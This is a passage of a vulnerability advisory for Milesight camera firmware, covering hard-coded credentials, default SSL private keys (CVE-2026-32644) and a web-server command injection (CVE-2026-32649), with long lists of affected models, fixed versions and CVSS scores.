Update to T_61.8.0.4-r4 Vendor fix TS2966-X12TVPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS4466-X4RVPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS5366-X12VPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS8266-X4VPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS4441-X36RPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS4441-X36RE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS4466-X4RWE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS8266-X4WE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix MS-C2964-RFLPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C2972-RFLPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C2966-RFLWPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2866-X4TPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2866-X4TVPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2866-X4TGPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2841-X36TPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2841-X36TPC/W: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2867-X5TPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2961-X12TPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS8266-FPC/P: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C2966-X12RLPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C2966-X12RLVPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C5366-X12LPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C5366-X12LVPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C5361-X12LPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-Cxx66-xxxxGOPC : 45.8.0.2-AIoT-r4 and prior versions: Update to 45.8.0.2-AIoT-r5 Vendor fix SC211: C_21.1.0.8-r4 and prior versions: Update to C_21.1.0.8-r5 Vendor fix SP111: 52.8.0.4-r5 and prior versions: Update to 52.8.0.4-r6 Vendor fix MS-Cxx66-RFIPKG1: 63.8.0.4-r1-NX and prior versions: Update to 63.8.0.5-r2-NX Vendor fix MS-Cxx72-RFIPKG1: 63.8.0.4-r1-NX and prior versions: Update to 63.8.0.5-r2-NX Vendor fix MS-Cxx66-FIPKG1: 63.8.0.4-r1-NX and prior versions: Update to 63.8.0.5-r2-NX Vendor fix MS-Cxx72-FIPKG1: 63.8.0.4-r1-NX and prior versions: Update to 63.8.0.5-r2-NX Mitigation Milesight asks all users to report potential security vulnerabilities to security@milesight.com. mailto:security@milesight.com Mitigation Learn more: Milesight Vulnerability Reporting Policy https://www.milesight.com/legal/vulnerability-report Relevant CWE: CWE-798 Use of Hard-coded Credentials Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2026-32644 Specific firmware versions of Milesight AIOT cameras use SSL certificates with default private keys. View CVE Details Affected Products Milesight Cameras Vendor: Milesight Product Version: Milesight MS-Cxx63-PD: <=51.7.0.77-r12, Milesight MS-Cxx64-xPD: <=51.7.0.77-r12, Milesight MS-Cxx73-xPD: <=51.7.0.77-r12, Milesight MS-Cxx75-xxPD: <=51.7.0.77-r12, Milesight MS-Cxx83-xPD: <=51.7.0.77-r12, Milesight MS-Cxx74-PA: <=3x.8.0.3-r11, Milesight MS-C8477-HPG1: <=63.8.0.4-r3, Milesight MS-C8477-PC: <=48.8.0.4-r3, Milesight MS-C5321-FPE: <=62.8.0.4-r5, Milesight MS-Cxx72-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx62-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx52-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx66-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx66-xxxGPE: <=61.8.0.5-r2, Milesight MS-Cxx61-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx67-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx71-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx41-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx76-PE: <=61.8.0.5-r2, Milesight MS-Cxx65-PE: <=61.8.0.5-r2, Milesight MS-Cxx66-xxxG1: <=63.8.0.5-r3, Milesight MS-Cxx62-xxxG1: <=63.8.0.5-r3, Milesight MS-Cxx72-xxxG1: <=63.8.0.5-r3, Milesight MS-CQxx31-xxxG1: <=CQ_63.8.0.5-r1, Milesight MS-CQxx68-xxxG1: <=CQ_63.8.0.5-r1, Milesight MS-CQxx72-xxxG1: <=CQ_63.8.0.5-r1, Milesight MS-Nxxxx-NxE: <=7x.9.0.19-r5, Milesight MS-Nxxxx-xxC: <=7x.9.0.19-r5, Milesight MS-Nxxxx-xxE: <=7x.9.0.19-r5, Milesight MS-Nxxxx-xxG: <=7x.9.0.19-r5, Milesight MS-Nxxxx-xxH: <=7x.9.0.19-r5, Milesight MS-Nxxxx-xxT: <=7x.9.0.19-r5, Milesight PMC8266-FPE: <=PO_61.8.0.4_LPR, Milesight PMC8266-FGPE: <=PO_61.8.0.4_LPR, Milesight PM3322-E: <=PI_61.8.0.3_LPR-r3, Milesight TS4466-X4RIPG1: <=T_63.8.0.4_LPR-r3, Milesight TS5366-X12RIPG1: <=T_63.8.0.4_LPR-r3, Milesight TS8266-X4RIPG1: <=T_63.8.0.4_LPR-r3, Milesight TS4466-X4RIVPG1: <=T_63.8.0.4_LPR-r3, Milesight TS4466-RFIVPG1: <=T_63.8.0.4_LPR-r3, Milesight TS8266-X4RIVPG1: <=T_63.8.0.4_LPR-r3, Milesight TS8266-RFIVPG1: <=T_63.8.0.4_LPR-r3, Milesight TS4466-X4RIWG1: <=T_63.8.0.4_LPR-r3, Milesight TS8266-X4RIWG1: <=T_63.8.0.4_LPR-r3, Milesight TS5510-GVH: <=T_47.8.0.4_LPR-r7, Milesight TS5510-GH: <=T_47.8.0.4_LPR-r6, Milesight TS5511-GVH: <=T_47.8.0.4_LPR-r6, Milesight TS2966-X12TPE: <=T_61.8.0.4_LPR-r3, Milesight TS4466-X4RPE: <=T_61.8.0.4_LPR-r3, Milesight TS5366-X12PE: <=T_61.8.0.4_LPR-r3, Milesight TS8266-X4PE: <=T_61.8.0.4_LPR-r3, Milesight TS2966-X12TVPE: <=T_61.8.0.4_LPR-r3, Milesight TS4466-X4RVPE: <=T_61.8.0.4_LPR-r3, Milesight TS5366-X12VPE: <=T_61.8.0.4_LPR-r3, Milesight TS8266-X4VPE: <=T_61.8.0.4_LPR-r3, Milesight TS4441-X36RPE: <=T_61.8.0.4_LPR-r3, Milesight TS4441-X36RE: <=T_61.8.0.4_LPR-r3, Milesight TS4466-X4RWE: <=T_61.8.0.4_LPR-r3, Milesight TS8266-X4WE: <=T_61.8.0.4_LPR-r3, Milesight MS-C2964-RFLPC: <=T_45.8.0.3-r9, Milesight MS-C2972-RFLPC: <=T_45.8.0.3-r9, Milesight MS-C2966-RFLWPC: <=T_45.8.0.3-r9, Milesight TS2866-X4TPC: <=T_45.8.0.3-r9, Milesight TS2866-X4TVPC: <=T_45.8.0.3-r9, Milesight TS2866-X4TGPC: <=T_45.8.0.3-r9, Milesight TS2841-X36TPC: <=T_45.8.0.3-r9, Milesight TS2841-X36TPC/W: <=T_45.8.0.3-r9, Milesight TS2867-X5TPC: <=T_45.8.0.3-r9, Milesight TS2961-X12TPC: <=T_45.8.0.3-r9, Milesight TS8266-FPC/P: <=T_45.8.0.3-r9, Milesight MS-C2966-X12RLPC: <=T_45.8.0.3-r9, Milesight MS-C2966-X12RLVPC: <=T_45.8.0.3-r9, Milesight MS-C5366-X12LPC: <=T_45.8.0.3-r9, Milesight MS-C5366-X12LVPC: <=T_45.8.0.3-r9, Milesight MS-C5361-X12LPC: <=T_45.8.0.3-r9, Milesight MS-Cxx66-xxxxGOPC: <=45.8.0.2-AIoT-r4, Milesight SC211: <=C_21.1.0.8-r4, Milesight SP111: <=52.8.0.4-r5, Milesight MS-Cxx66-RFIPKG1: <=63.8.0.4-r1-NX, Milesight MS-Cxx72-RFIPKG1: <=63.8.0.4-r1-NX, Milesight MS-Cxx66-FIPKG1: <=63.8.0.4-r1-NX, Milesight MS-Cxx72-FIPKG1: <=63.8.0.4-r1-NX Product Status: known_affected Remediations Mitigation Milesight advises all users to update their device to the latest firmware versions of PE/PC/PA found at https://www.milesight.com/support/download/firmware.  https://www.milesight.com/support/download/firmware Vendor fix MS-Cxx63-PD: 51.7.0.77-r12 and prior versions: Update to 51.7.0.77-r13 Vendor fix MS-Cxx64-xPD: 51.7.0.77-r12 and prior versions: Update to 51.7.0.77-r13 Vendor fix MS-Cxx73-xPD: 51.7.0.77-r12 and prior versions: Update to 51.7.0.77-r13 Vendor fix MS-Cxx75-xxPD: 51.7.0.77-r12 and prior versions: Update to 51.7.0.77-r13 Vendor fix MS-Cxx83-xPD: 51.7.0.77-r12 and prior versions: Update to 51.7.0.77-r13 Vendor fix MS-Cxx74-PA: 3x.8.0.3-r11 and prior versions: Update to 3x.8.0.3-r13 Vendor fix MS-C8477-HPG1: 63.8.0.4-r3 and prior versions: Update to 63.8.0.4-r4 Vendor fix MS-C8477-PC: 48.8.0.4-r3 and prior versions: Update to 48.8.0.4-r4 Vendor fix MS-C5321-FPE: 62.8.0.4-r5 and prior versions: Update to 62.8.0.4-r6 Vendor fix MS-Cxx72-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx62-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx52-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx66-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx66-xxxGPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx61-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx67-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx71-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx41-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx76-PE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx65-PE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx66-xxxG1: 63.8.0.5-r3 and prior versions: Update to 63.8.0.5-r4 Vendor fix MS-Cxx62-xxxG1: 63.8.0.5-r3 and prior versions: Update to 63.8.0.5-r4 Vendor fix MS-Cxx72-xxxG1: 63.8.0.5-r3 and prior versions: Update to 63.8.0.5-r4 Vendor fix MS-CQxx31-xxxG1: CQ_63.8.0.5-r1 and prior versions: Update to CQ_63.8.0.5-r2 Vendor fix MS-CQxx68-xxxG1: CQ_63.8.0.5-r1 and prior versions: Update to CQ_63.8.0.5-r2 Vendor fix MS-CQxx72-xxxG1: CQ_63.8.0.5-r1 and prior versions: Update to CQ_63.8.0.5-r2 Vendor fix MS-Nxxxx-NxE: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6 Vendor fix MS-Nxxxx-xxC: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6 Vendor fix MS-Nxxxx-xxE: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6 Vendor fix MS-Nxxxx-xxG: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6 Vendor fix MS-Nxxxx-xxH: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6 Vendor fix MS-Nxxxx-xxT: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6 Vendor fix PMC8266-FPE: PO_61.8.0.4_LPR and prior versions: Update to PO_61.8.0.4-r1 Vendor fix PMC8266-FGPE: PO_61.8.0.4_LPR and prior versions: Update to PO_61.8.0.4-r1 Vendor fix PM3322-E: PI_61.8.0.3_LPR-r3 and prior versions: Update to PI_61.8.0.3-r5 Vendor fix TS4466-X4RIPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS5366-X12RIPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS8266-X4RIPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS4466-X4RIVPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS4466-RFIVPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS8266-X4RIVPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS8266-RFIVPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS4466-X4RIWG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS8266-X4RIWG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS5510-GVH: T_47.8.0.4_LPR-r7 and prior versions: Update to T_47.8.0.4-r8 Vendor fix TS5510-GH: T_47.8.0.4_LPR-r6 and prior versions : Update to T_47.8.0.4-r8 Vendor fix TS5511-GVH: T_47.8.0.4_LPR-r6 and prior versions: Update to T_47.8.0.4-r8 Vendor fix TS2966-X12TPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS4466-X4RPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS5366-X12PE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS8266-X4PE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS2966-X12TVPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS4466-X4RVPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS5366-X12VPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS8266-X4VPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS4441-X36RPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS4441-X36RE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS4466-X4RWE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS8266-X4WE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix MS-C2964-RFLPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C2972-RFLPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C2966-RFLWPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2866-X4TPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2866-X4TVPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2866-X4TGPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2841-X36TPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2841-X36TPC/W: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2867-X5TPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2961-X12TPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS8266-FPC/P: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C2966-X12RLPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C2966-X12RLVPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C5366-X12LPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C5366-X12LVPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C5361-X12LPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-Cxx66-xxxxGOPC : 45.8.0.2-AIoT-r4 and prior versions: Update to 45.8.0.2-AIoT-r5 Vendor fix SC211: C_21.1.0.8-r4 and prior versions: Update to C_21.1.0.8-r5 Vendor fix SP111: 52.8.0.4-r5 and prior versions: Update to 52.8.0.4-r6 Vendor fix MS-Cxx66-RFIPKG1: 63.8.0.4-r1-NX and prior versions: Update to 63.8.0.5-r2-NX Vendor fix MS-Cxx72-RFIPKG1: 63.8.0.4-r1-NX and prior versions: Update to 63.8.0.5-r2-NX Vendor fix MS-Cxx66-FIPKG1: 63.8.0.4-r1-NX and prior versions: Update to 63.8.0.5-r2-NX Vendor fix MS-Cxx72-FIPKG1: 63.8.0.4-r1-NX and prior versions: Update to 63.8.0.5-r2-NX Mitigation Milesight asks all users to report potential security vulnerabilities to security@milesight.com. mailto:security@milesight.com Mitigation Learn more: Milesight Vulnerability Reporting Policy https://www.milesight.com/legal/vulnerability-report Relevant CWE: CWE-321 Use of Hard-coded Cryptographic Key Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2026-32649 A command injection vulnerability exists in the web server of specific firmware versions of Milesight cameras. View CVE Details Affected Products Milesight Cameras Vendor: Milesight Product Version: Milesight MS-Cxx63-PD: <=51.7.0.77-r12, Milesight MS-Cxx64-xPD: <=51.7.0.77-r12, Milesight MS-Cxx73-xPD: <=51.7.0.77-r12, Milesight MS-Cxx75-xxPD: <=51.7.0.77-r12, Milesight MS-Cxx83-xPD: <=51.7.0.77-r12, Milesight MS-Cxx74-PA: <=3x.8.0.3-r11, Milesight MS-C8477-HPG1: <=63.8.0.4-r3, Milesight MS-C8477-PC: <=48.8.0.4-r3, Milesight MS-C5321-FPE: <=62.8.0.4-r5, Milesight MS-Cxx72-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx62-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx52-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx66-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx66-xxxGPE: <=61.8.0.5-r2, Milesight MS-Cxx61-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx67-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx71-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx41-xxxPE: <=61.8.0.5-r2, Milesight MS-Cxx76-PE: <=61.8.0.5-r2, Milesight MS-Cxx65-PE: <=61.8.0.5-r2, Milesight MS-Cxx66-xxxG1: <=63.8.0.5-r3, Milesight MS-Cxx62-xxxG1: <=63.8.0.5-r3, Milesight MS-Cxx72-xxxG1: <=63.8.0.5-r3, Milesight MS-CQxx31-xxxG1: <=CQ_63.8.0.5-r1, Milesight MS-CQxx68-xxxG1: <=CQ_63.8.0.5-r1, Milesight MS-CQxx72-xxxG1: <=CQ_63.8.0.5-r1, Milesight MS-Nxxxx-NxE: <=7x.9.0.19-r5, Milesight MS-Nxxxx-xxC: <=7x.9.0.19-r5, Milesight MS-Nxxxx-xxE: <=7x.9.0.19-r5, Milesight MS-Nxxxx-xxG: <=7x.9.0.19-r5, Milesight MS-Nxxxx-xxH: <=7x.9.0.19-r5, Milesight MS-Nxxxx-xxT: <=7x.9.0.19-r5, Milesight PMC8266-FPE: <=PO_61.8.0.4_LPR, Milesight PMC8266-FGPE: <=PO_61.8.0.4_LPR, Milesight PM3322-E: <=PI_61.8.0.3_LPR-r3, Milesight TS4466-X4RIPG1: <=T_63.8.0.4_LPR-r3, Milesight TS5366-X12RIPG1: <=T_63.8.0.4_LPR-r3, Milesight TS8266-X4RIPG1: <=T_63.8.0.4_LPR-r3, Milesight TS4466-X4RIVPG1: <=T_63.8.0.4_LPR-r3, Milesight TS4466-RFIVPG1: <=T_63.8.0.4_LPR-r3, Milesight TS8266-X4RIVPG1: <=T_63.8.0.4_LPR-r3, Milesight TS8266-RFIVPG1: <=T_63.8.0.4_LPR-r3, Milesight TS4466-X4RIWG1: <=T_63.8.0.4_LPR-r3, Milesight TS8266-X4RIWG1: <=T_63.8.0.4_LPR-r3, Milesight TS5510-GVH: <=T_47.8.0.4_LPR-r7, Milesight TS5510-GH: <=T_47.8.0.4_LPR-r6, Milesight TS5511-GVH: <=T_47.8.0.4_LPR-r6, Milesight TS2966-X12TPE: <=T_61.8.0.4_LPR-r3, Milesight TS4466-X4RPE: <=T_61.8.0.4_LPR-r3, Milesight TS5366-X12PE: <=T_61.8.0.4_LPR-r3, Milesight TS8266-X4PE: <=T_61.8.0.4_LPR-r3, Milesight TS2966-X12TVPE: <=T_61.8.0.4_LPR-r3, Milesight TS4466-X4RVPE: <=T_61.8.0.4_LPR-r3, Milesight TS5366-X12VPE: <=T_61.8.0.4_LPR-r3, Milesight TS8266-X4VPE: <=T_61.8.0.4_LPR-r3, Milesight TS4441-X36RPE: <=T_61.8.0.4_LPR-r3, Milesight TS4441-X36RE: <=T_61.8.0.4_LPR-r3, Milesight TS4466-X4RWE: <=T_61.8.0.4_LPR-r3, Milesight TS8266-X4WE: <=T_61.8.0.4_LPR-r3, Milesight MS-C2964-RFLPC: <=T_45.8.0.3-r9, Milesight MS-C2972-RFLPC: <=T_45.8.0.3-r9, Milesight MS-C2966-RFLWPC: <=T_45.8.0.3-r9, Milesight TS2866-X4TPC: <=T_45.8.0.3-r9, Milesight TS2866-X4TVPC: <=T_45.8.0.3-r9, Milesight TS2866-X4TGPC: <=T_45.8.0.3-r9, Milesight TS2841-X36TPC: <=T_45.8.0.3-r9, Milesight TS2841-X36TPC/W: <=T_45.8.0.3-r9, Milesight TS2867-X5TPC: <=T_45.8.0.3-r9, Milesight TS2961-X12TPC: <=T_45.8.0.3-r9, Milesight TS8266-FPC/P: <=T_45.8.0.3-r9, Milesight MS-C2966-X12RLPC: <=T_45.8.0.3-r9, Milesight MS-C2966-X12RLVPC: <=T_45.8.0.3-r9, Milesight MS-C5366-X12LPC: <=T_45.8.0.3-r9, Milesight MS-C5366-X12LVPC: <=T_45.8.0.3-r9, Milesight MS-C5361-X12LPC: <=T_45.8.0.3-r9, Milesight MS-Cxx66-xxxxGOPC: <=45.8.0.2-AIoT-r4, Milesight SC211: <=C_21.1.0.8-r4, Milesight SP111: <=52.8.0.4-r5, Milesight MS-Cxx66-RFIPKG1: <=63.8.0.4-r1-NX, Milesight MS-Cxx72-RFIPKG1: <=63.8.0.4-r1-NX, Milesight MS-Cxx66-FIPKG1: <=63.8.0.4-r1-NX, Milesight MS-Cxx72-FIPKG1: <=63.8.0.4-r1-NX Product Status: known_affected Remediations Mitigation Milesight advises all users to update their device to the latest firmware versions of PE/PC/PA found at https://www.milesight.com/support/download/firmware.  https://www.milesight.com/support/download/firmware Vendor fix MS-Cxx63-PD: 51.7.0.77-r12 and prior versions: Update to 51.7.0.77-r13 Vendor fix MS-Cxx64-xPD: 51.7.0.77-r12 and prior versions: Update to 51.7.0.77-r13 Vendor fix MS-Cxx73-xPD: 51.7.0.77-r12 and prior versions: Update to 51.7.0.77-r13 Vendor fix MS-Cxx75-xxPD: 51.7.0.77-r12 and prior versions: Update to 51.7.0.77-r13 Vendor fix MS-Cxx83-xPD: 51.7.0.77-r12 and prior versions: Update to 51.7.0.77-r13 Vendor fix MS-Cxx74-PA: 3x.8.0.3-r11 and prior versions: Update to 3x.8.0.3-r13 Vendor fix MS-C8477-HPG1: 63.8.0.4-r3 and prior versions: Update to 63.8.0.4-r4 Vendor fix MS-C8477-PC: 48.8.0.4-r3 and prior versions: Update to 48.8.0.4-r4 Vendor fix MS-C5321-FPE: 62.8.0.4-r5 and prior versions: Update to 62.8.0.4-r6 Vendor fix MS-Cxx72-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx62-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx52-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx66-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx66-xxxGPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx61-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx67-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx71-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx41-xxxPE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx76-PE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx65-PE: 61.8.0.5-r2 and prior versions: Update to 61.8.0.5-r2 Vendor fix MS-Cxx66-xxxG1: 63.8.0.5-r3 and prior versions: Update to 63.8.0.5-r4 Vendor fix MS-Cxx62-xxxG1: 63.8.0.5-r3 and prior versions: Update to 63.8.0.5-r4 Vendor fix MS-Cxx72-xxxG1: 63.8.0.5-r3 and prior versions: Update to 63.8.0.5-r4 Vendor fix MS-CQxx31-xxxG1: CQ_63.8.0.5-r1 and prior versions: Update to CQ_63.8.0.5-r2 Vendor fix MS-CQxx68-xxxG1: CQ_63.8.0.5-r1 and prior versions: Update to CQ_63.8.0.5-r2 Vendor fix MS-CQxx72-xxxG1: CQ_63.8.0.5-r1 and prior versions: Update to CQ_63.8.0.5-r2 Vendor fix MS-Nxxxx-NxE: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6 Vendor fix MS-Nxxxx-xxC: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6 Vendor fix MS-Nxxxx-xxE: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6 Vendor fix MS-Nxxxx-xxG: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6 Vendor fix MS-Nxxxx-xxH: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6 Vendor fix MS-Nxxxx-xxT: 7x.9.0.19-r5 and prior versions: Update to 7x.9.0.19-r6 Vendor fix PMC8266-FPE: PO_61.8.0.4_LPR and prior versions: Update to PO_61.8.0.4-r1 Vendor fix PMC8266-FGPE: PO_61.8.0.4_LPR and prior versions: Update to PO_61.8.0.4-r1 Vendor fix PM3322-E: PI_61.8.0.3_LPR-r3 and prior versions: Update to PI_61.8.0.3-r5 Vendor fix TS4466-X4RIPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS5366-X12RIPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS8266-X4RIPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS4466-X4RIVPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS4466-RFIVPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS8266-X4RIVPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS8266-RFIVPG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS4466-X4RIWG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS8266-X4RIWG1: T_63.8.0.4_LPR-r3 and prior versions: Update to T_63.8.0.4-r4 Vendor fix TS5510-GVH: T_47.8.0.4_LPR-r7 and prior versions: Update to T_47.8.0.4-r8 Vendor fix TS5510-GH: T_47.8.0.4_LPR-r6 and prior versions : Update to T_47.8.0.4-r8 Vendor fix TS5511-GVH: T_47.8.0.4_LPR-r6 and prior versions: Update to T_47.8.0.4-r8 Vendor fix TS2966-X12TPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS4466-X4RPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS5366-X12PE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix 